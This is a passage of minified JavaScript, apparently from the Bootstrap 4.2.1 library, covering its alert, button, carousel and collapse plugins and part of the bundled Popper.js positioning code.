t.offsetHeight},triggerTransitionEnd:function(t){p(t).trigger(e)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var i in n)if(Object.prototype.hasOwnProperty.call(n,i)){var o=n[i],r=e[i],s=r&&m.isElement(r)?"element":(a=r,{}.toString.call(a).match(/\s([a-z]+)/i)[1].toLowerCase());if(!new RegExp(o).test(s))throw new Error(t.toUpperCase()+': Option "'+i+'" provided type "'+s+'" but expected type "'+o+'".')}var a},findShadowRoot:function(t){if(!document.documentElement.attachShadow)return null;if("function"!=typeof t.getRootNode)return t instanceof ShadowRoot?t:t.parentNode?m.findShadowRoot(t.parentNode):null;var e=t.getRootNode();return e instanceof ShadowRoot?e:null}};p.fn.emulateTransitionEnd=n,p.event.special[m.TRANSITION_END]={bindType:e,delegateType:e,handle:function(t){if(p(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}};var o="alert",r="bs.alert",a="."+r,c=p.fn[o],h={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},u="alert",f="fade",d="show",g=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function(t){var e=this._element;t&&(e=this._getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){p.removeData(this._element,r),this._element=null},t._getRootElement=function(t){var e=m.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=p(t).closest("."+u)[0]),n},t._triggerCloseEvent=function(t){var e=p.Event(h.CLOSE);return p(t).trigger(e),e},t._removeElement=function(e){var n=this;if(p(e).removeClass(d),p(e).hasClass(f)){var t=m.getTransitionDurationFromElement(e);p(e).one(m.TRANSITION_END,function(t){return n._destroyElement(e,t)}).emulateTransitionEnd(t)}else this._destroyElement(e)},t._destroyElement=function(t){p(t).detach().trigger(h.CLOSED).remove()},i._jQueryInterface=function(n){return this.each(function(){var t=p(this),e=t.data(r);e||(e=new i(this),t.data(r,e)),"close"===n&&e[n](this)})},i._handleDismiss=function(e){return function(t){t&&t.preventDefault(),e.close(this)}},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}}]),i}();p(document).on(h.CLICK_DATA_API,'[data-dismiss="alert"]',g._handleDismiss(new g)),p.fn[o]=g._jQueryInterface,p.fn[o].Constructor=g,p.fn[o].noConflict=function(){return p.fn[o]=c,g._jQueryInterface};var _="button",v="bs.button",y="."+v,E=".data-api",b=p.fn[_],w="active",T="btn",C="focus",S='[data-toggle^="button"]',D='[data-toggle="buttons"]',I='input:not([type="hidden"])',A=".active",O=".btn",N={CLICK_DATA_API:"click"+y+E,FOCUS_BLUR_DATA_API:"focus"+y+E+" blur"+y+E},k=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=p(this._element).closest(D)[0];if(n){var i=this._element.querySelector(I);if(i){if("radio"===i.type)if(i.checked&&this._element.classList.contains(w))t=!1;else{var o=n.querySelector(A);o&&p(o).removeClass(w)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!this._element.classList.contains(w),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute("aria-pressed",!this._element.classList.contains(w)),t&&p(this._element).toggleClass(w)},t.dispose=function(){p.removeData(this._element,v),this._element=null},n._jQueryInterface=function(e){return this.each(function(){var t=p(this).data(v);t||(t=new n(this),p(this).data(v,t)),"toggle"===e&&t[e]()})},s(n,null,[{key:"VERSION",get:function(){return"4.2.1"}}]),n}();p(document).on(N.CLICK_DATA_API,S,function(t){t.preventDefault();var e=t.target;p(e).hasClass(T)||(e=p(e).closest(O)),k._jQueryInterface.call(p(e),"toggle")}).on(N.FOCUS_BLUR_DATA_API,S,function(t){var e=p(t.target).closest(O)[0];p(e).toggleClass(C,/^focus(in)?$/.test(t.type))}),p.fn[_]=k._jQueryInterface,p.fn[_].Constructor=k,p.fn[_].noConflict=function(){return p.fn[_]=b,k._jQueryInterface};var L="carousel",P="bs.carousel",x="."+P,H=".data-api",j=p.fn[L],R={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0,touch:!0},F={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean",touch:"boolean"},M="next",W="prev",U="left",B="right",q={SLIDE:"slide"+x,SLID:"slid"+x,KEYDOWN:"keydown"+x,MOUSEENTER:"mouseenter"+x,MOUSELEAVE:"mouseleave"+x,TOUCHSTART:"touchstart"+x,TOUCHMOVE:"touchmove"+x,TOUCHEND:"touchend"+x,POINTERDOWN:"pointerdown"+x,POINTERUP:"pointerup"+x,DRAG_START:"dragstart"+x,LOAD_DATA_API:"load"+x+H,CLICK_DATA_API:"click"+x+H},K="carousel",Q="active",Y="slide",V="carousel-item-right",X="carousel-item-left",z="carousel-item-next",G="carousel-item-prev",J="pointer-event",Z=".active",$=".active.carousel-item",tt=".carousel-item",et=".carousel-item img",nt=".carousel-item-next, .carousel-item-prev",it=".carousel-indicators",ot="[data-slide], [data-slide-to]",rt='[data-ride="carousel"]',st={TOUCH:"touch",PEN:"pen"},at=function(){function r(t,e){this._items=null,this._interval=null,this._activeElement=null,this._isPaused=!1,this._isSliding=!1,this.touchTimeout=null,this.touchStartX=0,this.touchDeltaX=0,this._config=this._getConfig(e),this._element=t,this._indicatorsElement=this._element.querySelector(it),this._touchSupported="ontouchstart"in document.documentElement||0<navigator.maxTouchPoints,this._pointerEvent=Boolean(window.PointerEvent||window.MSPointerEvent),this._addEventListeners()}var t=r.prototype;return t.next=function(){this._isSliding||this._slide(M)},t.nextWhenVisible=function(){!document.hidden&&p(this._element).is(":visible")&&"hidden"!==p(this._element).css("visibility")&&this.next()},t.prev=function(){this._isSliding||this._slide(W)},t.pause=function(t){t||(this._isPaused=!0),this._element.querySelector(nt)&&(m.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},t.to=function(t){var e=this;this._activeElement=this._element.querySelector($);var n=this._getItemIndex(this._activeElement);if(!(t>this._items.length-1||t<0))if(this._isSliding)p(this._element).one(q.SLID,function(){return e.to(t)});else{if(n===t)return this.pause(),void this.cycle();var i=n<t?M:W;this._slide(i,this._items[t])}},t.dispose=function(){p(this._element).off(x),p.removeData(this._element,P),this._items=null,this._config=null,this._element=null,this._interval=null,this._isPaused=null,this._isSliding=null,this._activeElement=null,this._indicatorsElement=null},t._getConfig=function(t){return t=l({},R,t),m.typeCheckConfig(L,t,F),t},t._handleSwipe=function(){var t=Math.abs(this.touchDeltaX);if(!(t<=40)){var e=t/this.touchDeltaX;0<e&&this.prev(),e<0&&this.next()}},t._addEventListeners=function(){var e=this;this._config.keyboard&&p(this._element).on(q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&p(this._element).on(q.MOUSEENTER,function(t){return e.pause(t)}).on(q.MOUSELEAVE,function(t){return e.cycle(t)}),this._addTouchEventListeners()},t._addTouchEventListeners=function(){var n=this;if(this._touchSupported){var e=function(t){n._pointerEvent&&st[t.originalEvent.pointerType.toUpperCase()]?n.touchStartX=t.originalEvent.clientX:n._pointerEvent||(n.touchStartX=t.originalEvent.touches[0].clientX)},i=function(t){n._pointerEvent&&st[t.originalEvent.pointerType.toUpperCase()]&&(n.touchDeltaX=t.originalEvent.clientX-n.touchStartX),n._handleSwipe(),"hover"===n._config.pause&&(n.pause(),n.touchTimeout&&clearTimeout(n.touchTimeout),n.touchTimeout=setTimeout(function(t){return n.cycle(t)},500+n._config.interval))};p(this._element.querySelectorAll(et)).on(q.DRAG_START,function(t){return t.preventDefault()}),this._pointerEvent?(p(this._element).on(q.POINTERDOWN,function(t){return e(t)}),p(this._element).on(q.POINTERUP,function(t){return i(t)}),this._element.classList.add(J)):(p(this._element).on(q.TOUCHSTART,function(t){return e(t)}),p(this._element).on(q.TOUCHMOVE,function(t){var e;(e=t).originalEvent.touches&&1<e.originalEvent.touches.length?n.touchDeltaX=0:n.touchDeltaX=e.originalEvent.touches[0].clientX-n.touchStartX}),p(this._element).on(q.TOUCHEND,function(t){return i(t)}))}},t._keydown=function(t){if(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},t._getItemIndex=function(t){return this._items=t&&t.parentNode?[].slice.call(t.parentNode.querySelectorAll(tt)):[],this._items.indexOf(t)},t._getItemByDirection=function(t,e){var n=t===M,i=t===W,o=this._getItemIndex(e),r=this._items.length-1;if((i&&0===o||n&&o===r)&&!this._config.wrap)return e;var s=(o+(t===W?-1:1))%this._items.length;return-1===s?this._items[this._items.length-1]:this._items[s]},t._triggerSlideEvent=function(t,e){var n=this._getItemIndex(t),i=this._getItemIndex(this._element.querySelector($)),o=p.Event(q.SLIDE,{relatedTarget:t,direction:e,from:i,to:n});return p(this._element).trigger(o),o},t._setActiveIndicatorElement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll(Z));p(e).removeClass(Q);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&p(n).addClass(Q)}},t._slide=function(t,e){var n,i,o,r=this,s=this._element.querySelector($),a=this._getItemIndex(s),l=e||s&&this._getItemByDirection(t,s),c=this._getItemIndex(l),h=Boolean(this._interval);if(o=t===M?(n=X,i=z,U):(n=V,i=G,B),l&&p(l).hasClass(Q))this._isSliding=!1;else if(!this._triggerSlideEvent(l,o).isDefaultPrevented()&&s&&l){this._isSliding=!0,h&&this.pause(),this._setActiveIndicatorElement(l);var u=p.Event(q.SLID,{relatedTarget:l,direction:o,from:a,to:c});if(p(this._element).hasClass(Y)){p(l).addClass(i),m.reflow(l),p(s).addClass(n),p(l).addClass(n);var f=parseInt(l.getAttribute("data-interval"),10);this._config.interval=f?(this._config.defaultInterval=this._config.defaultInterval||this._config.interval,f):this._config.defaultInterval||this._config.interval;var d=m.getTransitionDurationFromElement(s);p(s).one(m.TRANSITION_END,function(){p(l).removeClass(n+" "+i).addClass(Q),p(s).removeClass(Q+" "+i+" "+n),r._isSliding=!1,setTimeout(function(){return p(r._element).trigger(u)},0)}).emulateTransitionEnd(d)}else p(s).removeClass(Q),p(l).addClass(Q),this._isSliding=!1,p(this._element).trigger(u);h&&this.cycle()}},r._jQueryInterface=function(i){return this.each(function(){var t=p(this).data(P),e=l({},R,p(this).data());"object"==typeof i&&(e=l({},e,i));var n="string"==typeof i?i:e.slide;if(t||(t=new r(this,e),p(this).data(P,t)),"number"==typeof i)t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},r._dataApiClickHandler=function(t){var e=m.getSelectorFromElement(this);if(e){var n=p(e)[0];if(n&&p(n).hasClass(K)){var i=l({},p(n).data(),p(this).data()),o=this.getAttribute("data-slide-to");o&&(i.interval=!1),r._jQueryInterface.call(p(n),i),o&&p(n).data(P).to(o),t.preventDefault()}}},s(r,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return R}}]),r}();p(document).on(q.CLICK_DATA_API,ot,at._dataApiClickHandler),p(window).on(q.LOAD_DATA_API,function(){for(var t=[].slice.call(document.querySelectorAll(rt)),e=0,n=t.length;e<n;e++){var i=p(t[e]);at._jQueryInterface.call(i,i.data())}}),p.fn[L]=at._jQueryInterface,p.fn[L].Constructor=at,p.fn[L].noConflict=function(){return p.fn[L]=j,at._jQueryInterface};var lt="collapse",ct="bs.collapse",ht="."+ct,ut=p.fn[lt],ft={toggle:!0,parent:""},dt={toggle:"boolean",parent:"(string|element)"},pt={SHOW:"show"+ht,SHOWN:"shown"+ht,HIDE:"hide"+ht,HIDDEN:"hidden"+ht,CLICK_DATA_API:"click"+ht+".data-api"},mt="show",gt="collapse",_t="collapsing",vt="collapsed",yt="width",Et="height",bt=".show, .collapsing",wt='[data-toggle="collapse"]',Tt=function(){function a(e,t){this._isTransitioning=!1,this._element=e,this._config=this._getConfig(t),this._triggerArray=[].slice.call(document.querySelectorAll('[data-toggle="collapse"][href="#'+e.id+'"],[data-toggle="collapse"][data-target="#'+e.id+'"]'));for(var n=[].slice.call(document.querySelectorAll(wt)),i=0,o=n.length;i<o;i++){var r=n[i],s=m.getSelectorFromElement(r),a=[].slice.call(document.querySelectorAll(s)).filter(function(t){return t===e});null!==s&&0<a.length&&(this._selector=s,this._triggerArray.push(r))}this._parent=this._config.parent?this._getParent():null,this._config.parent||this._addAriaAndCollapsedClass(this._element,this._triggerArray),this._config.toggle&&this.toggle()}var t=a.prototype;return t.toggle=function(){p(this._element).hasClass(mt)?this.hide():this.show()},t.show=function(){var t,e,n=this;if(!this._isTransitioning&&!p(this._element).hasClass(mt)&&(this._parent&&0===(t=[].slice.call(this._parent.querySelectorAll(bt)).filter(function(t){return"string"==typeof n._config.parent?t.getAttribute("data-parent")===n._config.parent:t.classList.contains(gt)})).length&&(t=null),!(t&&(e=p(t).not(this._selector).data(ct))&&e._isTransitioning))){var i=p.Event(pt.SHOW);if(p(this._element).trigger(i),!i.isDefaultPrevented()){t&&(a._jQueryInterface.call(p(t).not(this._selector),"hide"),e||p(t).data(ct,null));var o=this._getDimension();p(this._element).removeClass(gt).addClass(_t),this._element.style[o]=0,this._triggerArray.length&&p(this._triggerArray).removeClass(vt).attr("aria-expanded",!0),this.setTransitioning(!0);var r="scroll"+(o[0].toUpperCase()+o.slice(1)),s=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,function(){p(n._element).removeClass(_t).addClass(gt).addClass(mt),n._element.style[o]="",n.setTransitioning(!1),p(n._element).trigger(pt.SHOWN)}).emulateTransitionEnd(s),this._element.style[o]=this._element[r]+"px"}}},t.hide=function(){var t=this;if(!this._isTransitioning&&p(this._element).hasClass(mt)){var e=p.Event(pt.HIDE);if(p(this._element).trigger(e),!e.isDefaultPrevented()){var n=this._getDimension();this._element.style[n]=this._element.getBoundingClientRect()[n]+"px",m.reflow(this._element),p(this._element).addClass(_t).removeClass(gt).removeClass(mt);var i=this._triggerArray.length;if(0<i)for(var o=0;o<i;o++){var r=this._triggerArray[o],s=m.getSelectorFromElement(r);if(null!==s)p([].slice.call(document.querySelectorAll(s))).hasClass(mt)||p(r).addClass(vt).attr("aria-expanded",!1)}this.setTransitioning(!0);this._element.style[n]="";var a=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,function(){t.setTransitioning(!1),p(t._element).removeClass(_t).addClass(gt).trigger(pt.HIDDEN)}).emulateTransitionEnd(a)}}},t.setTransitioning=function(t){this._isTransitioning=t},t.dispose=function(){p.removeData(this._element,ct),this._config=null,this._parent=null,this._element=null,this._triggerArray=null,this._isTransitioning=null},t._getConfig=function(t){return(t=l({},ft,t)).toggle=Boolean(t.toggle),m.typeCheckConfig(lt,t,dt),t},t._getDimension=function(){return p(this._element).hasClass(yt)?yt:Et},t._getParent=function(){var t,n=this;m.isElement(this._config.parent)?(t=this._config.parent,"undefined"!=typeof this._config.parent.jquery&&(t=this._config.parent[0])):t=document.querySelector(this._config.parent);var e='[data-toggle="collapse"][data-parent="'+this._config.parent+'"]',i=[].slice.call(t.querySelectorAll(e));return p(i).each(function(t,e){n._addAriaAndCollapsedClass(a._getTargetFromElement(e),[e])}),t},t._addAriaAndCollapsedClass=function(t,e){var n=p(t).hasClass(mt);e.length&&p(e).toggleClass(vt,!n).attr("aria-expanded",n)},a._getTargetFromElement=function(t){var e=m.getSelectorFromElement(t);return e?document.querySelector(e):null},a._jQueryInterface=function(i){return this.each(function(){var t=p(this),e=t.data(ct),n=l({},ft,t.data(),"object"==typeof i&&i?i:{});if(!e&&n.toggle&&/show|hide/.test(i)&&(n.toggle=!1),e||(e=new a(this,n),t.data(ct,e)),"string"==typeof i){if("undefined"==typeof e[i])throw new TypeError('No method named "'+i+'"');e[i]()}})},s(a,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return ft}}]),a}();p(document).on(pt.CLICK_DATA_API,wt,function(t){"A"===t.currentTarget.tagName&&t.preventDefault();var n=p(this),e=m.getSelectorFromElement(this),i=[].slice.call(document.querySelectorAll(e));p(i).each(function(){var t=p(this),e=t.data(ct)?"toggle":n.data();Tt._jQueryInterface.call(t,e)})}),p.fn[lt]=Tt._jQueryInterface,p.fn[lt].Constructor=Tt,p.fn[lt].noConflict=function(){return p.fn[lt]=ut,Tt._jQueryInterface};for(var Ct="undefined"!=typeof window&&"undefined"!=typeof document,St=["Edge","Trident","Firefox"],Dt=0,It=0;It<St.length;It+=1)if(Ct&&0<=navigator.userAgent.indexOf(St[It])){Dt=1;break}var At=Ct&&window.Promise?function(t){var e=!1;return function(){e||(e=!0,window.Promise.resolve().then(function(){e=!1,t()}))}}:function(t){var e=!1;return function(){e||(e=!0,setTimeout(function(){e=!1,t()},Dt))}};function Ot(t){return t&&"[object Function]"==={}.toString.call(t)}function Nt(t,e){if(1!==t.nodeType)return[];var n=t.ownerDocument.defaultView.getComputedStyle(t,null);return e?n[e]:n}function kt(t){return"HTML"===t.nodeName?t:t.parentNode||t.host}function Lt(t){if(!t)return document.body;switch(t.nodeName){case"HTML":case"BODY":return t.ownerDocument.body;case"#document":return t.body}var e=Nt(t),n=e.overflow,i=e.overflowX,o=e.overflowY;return/(auto|scroll|overlay)/.test(n+o+i)?t:Lt(kt(t))}var Pt=Ct&&!(!window.MSInputMethodContext||!document.documentMode),xt=Ct&&/MSIE 10/.test(navigator.userAgent);function Ht(t){return 11===t?Pt:10===t?xt:Pt||xt}function jt(t){if(!t)return document.documentElement;for(var e=Ht(10)?document.body:null,n=t.offsetParent||null;n===e&&t.nextElementSibling;)n=(t=t.nextElementSibling).offsetParent;var i=n&&n.nodeName;return i&&"BODY"!==i&&"HTML"!==i?-1!==["TH","TD","TABLE"].indexOf(n.nodeName)&&"static"===Nt(n,"position")?jt(n):n:t?t.ownerDocument.documentElement:document.documentElement}function Rt(t){return null!==t.parentNode?Rt(t.parentNode):t}function Ft(t,e){if(!(t&&t.nodeType&&e&&e.nodeType))return document.documentElement;var n=t.compareDocumentPosition(e)&Node.DOCUMENT_POSITION_FOLLOWING,i=n?t:e,o=n?e:t,r=document.createRange();r.setStart(i,0),r.setEnd(o,0);var s,a,l=r.commonAncestorContainer;if(t!==l&&e!==l||i.contains(o))return"BODY"===(a=(s=l).nodeName)||"HTML"!==a&&jt(s.firstElementChild)!==s?jt(l):l;var c=Rt(t);return c.host?Ft(c.host,e):Ft(t,Rt(e).host)}function Mt(t){var e="top"===(1<arguments.length&&void 0!==arguments[1]?arguments[1]:"top")?"scrollTop":"scrollLeft",n=t.nodeName;if("BODY"!==n&&"HTML"!==n)return t[e];var i=t.ownerDocument.documentElement;return(t.ownerDocument.scrollingElement||i)[e]}function Wt(t,e){var n="x"===e?"Left":"Top",i="Left"===n?"Right":"Bottom";return parseFloat(t["border"+n+"Width"],10)+parseFloat(t["border"+i+"Width"],10)}function Ut(t,e,n,i){return Math.max(e["offset"+t],e["scroll"+t],n["client"+t],n["offset"+t],n["scroll"+t],Ht(10)?parseInt(n["offset"+t])+parseInt(i["margin"+("Height"===t?"Top":"Left")])+parseInt(i["margin"+("Height"===t?"Bottom":"Right")]):0)}function Bt(t){var e=t.body,n=t.documentElement,i=Ht(10)&&getComputedStyle(n);return{height:Ut("Height",e,n,i),width:Ut("Width",e,n,i)}}var qt=function(){function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}return function(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}}(),Kt=function(t,e,n){return e in t?Object.defineProperty(t,e,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[e]=n,t},Qt=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t};function Yt(t){return Qt({},t,{right:t.left+t.width,bottom:t.top+t.height})}function Vt(t){var e={};try{if(Ht(10)){e=t.getBoundingClientRect();var n=Mt(t,"top"),i=Mt(t,"left");e.top+=n,e.left+=i,e.bottom+=n,e.right+=i}else e=t.getBoundingClientRect()}catch(t){}var o={left:e.left,top:e.top,width:e.right-e.left,height:e.bottom-e.top},r="HTML"===t.nodeName?Bt(t.ownerDocument):{},s=r.width||t.clientWidth||o.right-o.left,a=r.height||t.clientHeight||o.bottom-o.top,l=t.offsetWidth-s,c=t.offsetHeight-a;if(l||c){var h=Nt(t);l-=Wt(h,"x"),c-=Wt(h,"y"),o.width-=l,o.height-=c}return Yt(o)}function Xt(t,e){var n=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=Ht(10),o="HTML"===e.nodeName,r=Vt(t),s=Vt(e),a=Lt(t),l=Nt(e),c=parseFloat(l.borderTopWidth,10),h=parseFloat(l.borderLeftWidth,10);n&&o&&(s.top=Math.max(s.top,0),s.left=Math.max(s.left,0));var u=Yt({top:r.top-s.top-c,left:r.left-s.left-h,width:r.width,height:r.height});if(u.marginTop=0,u.marginLeft=0,!i&&o){var f=parseFloat(l.marginTop,10),d=parseFloat(l.marginLeft,10);u.top-=c-f,u.bottom-=c-f,u.left-=h-d,u.right-=h-d,u.marginTop=f,u.marginLeft=d}return(i&&!n?e.contains(a):e===a&&"BODY"!==a.nodeName)&&(u=function(t,e){var n=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=Mt(e,"top"),o=Mt(e,"left"),r=n?-1:1;return t.top+=i*r,t.bottom+=i*r,t.left+=o*r,t.right+=o*r,t}(u,e)),u}function zt(t){if(!t||!t.parentElement||Ht())return document.documentElement;for(var e=t.parentElement;e&&"none"===Nt(e,"transform");)e=e.parentElement;return e||document.documentElement}function Gt(t,e,n,i){var o=4<arguments.length&&void 0!==arguments[4]&&arguments[4],r={top:0,left:0},s=o?zt(t):Ft(t,e);if("viewport"===i)r=function(t){var e=1<arguments.length&&void 0!==arguments[1]&&arguments[1],n=t.ownerDocument.documentElement,i=Xt(t,n),o=Math.max(n.clientWidth,window.innerWidth||0),r=Math.max(n.clientHeight,window.innerHeight||0),s=e?0:Mt(n),a=e?0:Mt(n,"left");return Yt({top:s-i.top+i.marginTop,left:a-i.left+i.marginLeft,width:o,height:r})}(s,o);else{var a=void 0;"scrollParent"===i?"BODY"===(a=Lt(kt(e))).nodeName&&(a=t.ownerDocument.documentElement):a="window"===i?t.ownerDocument.documentElement:i;var l=Xt(a,s,o);if("HTML"!==a.nodeName||function t(e){var n=e.nodeName;return"BODY"!==n&&"HTML"!==n&&("fixed"===Nt(e,"position")||t(kt(e)))}(s))r=l;else{var c=Bt(t.ownerDocument),h=c.height,u=c.width;r.top+=l.top-l.marginTop,r.bottom=h+l.top,r.left+=l.left-l.marginLeft,r.right=u+l.left}}var f="number"==typeof(n=n||0);return r.left+=f?n:n.left||0,r.top+=f?n:n.top||0,r.right-=f?n:n.right||0,r.bottom-=f?n:n.bottom||0,r}function Jt(t,e,i,n,o){var r=5<arguments.length&&void 0!==arguments[5]?arguments[5]:0;if(-1===t.indexOf("auto"))return t;var s=Gt(i,n,r,o),a={top:{width:s.width,height:e.top-s.top},right:{width:s.right-e.right,height:s.height},bottom:{width:s.width,height:s.bottom-e.bottom},left:{width:e.left-s.left,height:s.height}},l=Object.keys(a).map(function(t){return Qt({key:t},a[t],{area:(e=a[t],e.width*e.height)});var e}).sort(function(t,e){return e.area-t.area}),c=l.filter(function(t){var e=t.width,n=t.height;return e>=i.clientWidth&&n>=i.clientHeight}),h=0<c.length?c[0].key:l[0].key,u=t.split("-")[1];return h+(u?"-"+u:"")}function Zt(t,e,n){var i=3<arguments.length&&void 0!==arguments[3]?arguments[3]:null;return Xt(n,i?zt(e):Ft(e,n),i)}function $t(t){var e=t.ownerDocument.defaultView.getComputedStyle(t),n=parseFloat(e.marginTop||0)+parseFloat(e.marginBottom||0),i=parseFloat(e.marginLeft||0)+parseFloat(e.marginRight||0);return{width:t.offsetWidth+i,height:t.offsetHeight+n}}function te(t){var e={left:"right",right:"left",bottom:"top",top:"bottom"};return t.replace(/left|right|bottom|top/g,function(t){return e[t]})}function ee(t,e,n){n=n.split("-")[0];var i=$t(t),o={width:i.width,height:i.height},r=-1!==["right","left"].indexOf(n),s=r?"top":"left",a=r?"left":"top",l=r?"height":"width",c=r?"width":"height";return o[s]=e[s]+e[l]/2-i[l]/2,o[a]=n===a?e[a]-i[c]:e[te(a)],o}function ne(t,e){return Array.prototype.find?t.find(e):t.filter(e)[0]}function ie(t,n,e){return(void 0===e?t:t.slice(0,function(t,e,n){if(Array.prototype.findIndex)return t.findIndex(function(t){return t[e]===n});var i=ne(t,function(t){return t[e]===n});return t.indexOf(i)}(t,"name",e))).forEach(function(t){t.function&&console.warn("`modifier.function` is deprecated, use `modifier.fn`!");var e=t.function||t.fn;t.enabled&&Ot(e)&&(n.offsets.popper=Yt(n.offsets.popper),n.offsets.reference=Yt(n.offsets.reference),n=e(n,t))}),n}function oe(t,n){return t.some(function(t){var e=t.name;return t.enabled&&e===n})}function re(t){for(var e=[!1,"ms","Webkit","Moz","O"],n=t.charAt(0).toUpperCase()+t.slice(1),i=0;i<e.length;i++){var o=e[i],r=o?""+o+n:t;if("undefined"!=typeof document.body.style[r])return r}return null}function se(t){var e=t.ownerDocument;return e?e.defaultView:window}function ae(t,e,n,i){n.updateBound=i,se(t).addEventListener("resize",n.updateBound,{passive:!0});var o=Lt(t);return function t(e,n,i,o){var r="BODY"===e.nodeName,s=r?e.ownerDocument.defaultView:e;s.addEventListener(n,i,{passive:!0}),r||t(Lt(s.parentNode),n,i,o),o.push(s)}(o,"scroll",n.updateBound,n.scrollParents),n.scrollElement=o,n.eventsEnabled=!0,n}function le(){var t,e;this.state.eventsEnabled&&(cancelAnimationFrame(this.scheduleUpdate),this.state=(t=this.reference,e=this.state,se(t).removeEventListener("resize",e.updateBound),e.scrollParents.forEach(function(t){t.removeEventListener("scroll",e.updateBound)}),e.updateBound=null,e.scrollParents=[],e.scrollElement=null,e.eventsEnabled=!1,e))}function ce(t){return""!==t&&!isNaN(parseFloat(t))&&isFinite(t)}function he(n,i){Object.keys(i).forEach(function(t){var e="";-1!==["width","height","top","right","bottom","left"].indexOf(t)&&ce(i[t])&&(e="px"),n.style[t]=i[t]+e})}var ue=Ct&&/Firefox/i.test(navigator.userAgent);function fe(t,e,n){var i=ne(t,function(t){return t.name===e}),o=!!i&&t.some(function(t){return t.name===n&&t.enabled&&t.order<i.order});if(!o){var r="`"+e+"`",s="`"+n+"`";console.warn(s+" modifier is required by "+r+" modifier in order to work, be sure to include it before "+r+"!")}return o}var de=["auto-start","auto","auto-end","top-start","top","top-end","right-start","right","right-end","bottom-end","bottom","bottom-start","left-end","left","left-start"],pe=de.slice(3);function me(t){var e=1<arguments.length&&void 0!==arguments[1]&&arguments[1],n=pe.indexOf(t),i=pe.slice(n+1).concat(pe.slice(0,n));return e?i.reverse():i}var ge="flip",_e="clockwise",ve="counterclockwise";function ye(t,o,r,e){var s=[0,0],a=-1!==["right","left"].indexOf(e),n=t.split(/(\+|\-)/).map(function(t){return t.trim()}),i=n.indexOf(ne(n,function(t){return-1!==t.search(/,|\s/)}));n[i]&&-1===n[i].indexOf(",")&&console.warn("Offsets separated by white space(s) are deprecated, use a comma (,) instead.");var l=/\s*,\s*|\s+/,c=-1!==i?[n.slice(0,i).concat([n[i].split(l)[0]]),[n[i].split(l)[1]].concat(n.slice(i+1))]:[n];return(c=c.map(function(t,e){var n=(1===e?!a:a)?"height":"width",i=!1;return t.reduce(function(t,e){return""===t[t.length-1]&&-1!==["+","-"].indexOf(e)?(t[t.length-1]=e,i=!0,t):i?(t[t.length-1]+=e,i=!1,t):t.concat(e)},[]).map(function(t){return function(t,e,n,i){var o=t.match(/((?:\-|\+)?\d*\.?\d*)(.*)/),r=+o[1],s=o[2];if(!r)return t;if(0!==s.indexOf("%"))return"vh"!==s&&"vw"!==s?r:("vh"===s?Math.max(document.documentElement.clientHeight,window.innerHeight||0):Math.max(document.documentElement.clientWidth,window.innerWidth||0))/100*r;var a=void 0;switch(s){case"%p":a=n;break;case"%":case"%r":default:a=i}return Yt(a)[e]/100*r}(t,n,o,r)})})).forEach(function(n,i){n.forEach(function(t,e){ce(t)&&(s[i]+=t*("-"===n[e-1]?-1:1))})}),s}var Ee={placement:"bottom",positionFixed:!1,eventsEnabled:!0,removeOnDestroy:!1,onCreate:function(){},onUpdate:function(){},modifiers:{shift:{order:100,enabled:!0,fn:function(t){var e=t.placement,n=e.split("-")[0],i=e.split("-")[1];if(i){var o=t.offsets,r=o.reference,s=o.popper,a=-1!==["bottom","top"].indexOf(n),l=a?"left":"top",c=a?"width":"height",h={start:Kt({},l,r[l]),end:Kt({},l,r[l]+r[c]-s[c])};t.offsets.popper=Qt({},s,h[i])}return t}},offset:{order:200,enabled:!0,fn:function(t,e){var n=e.offset,i=t.placement,o=t.offsets,r=o.popper,s=o.reference,a=i.split("-")[0],l=void 0;return l=ce(+n)?[+n,0]:ye(n,r,s,a),"left"===a?(r.top+=l[0],r.left-=l[1]):"right"===a?(r.top+=l[0],r.left+=l[1]):"top"===a?(r.left+=l[0],r.top-=l[1]):"bottom"===a&&(r.left+=l[0],r.top+=l[1]),t.popper=r,t},offset:0},preventOverflow:{order:300,enabled:!0,fn:function(t,i){var 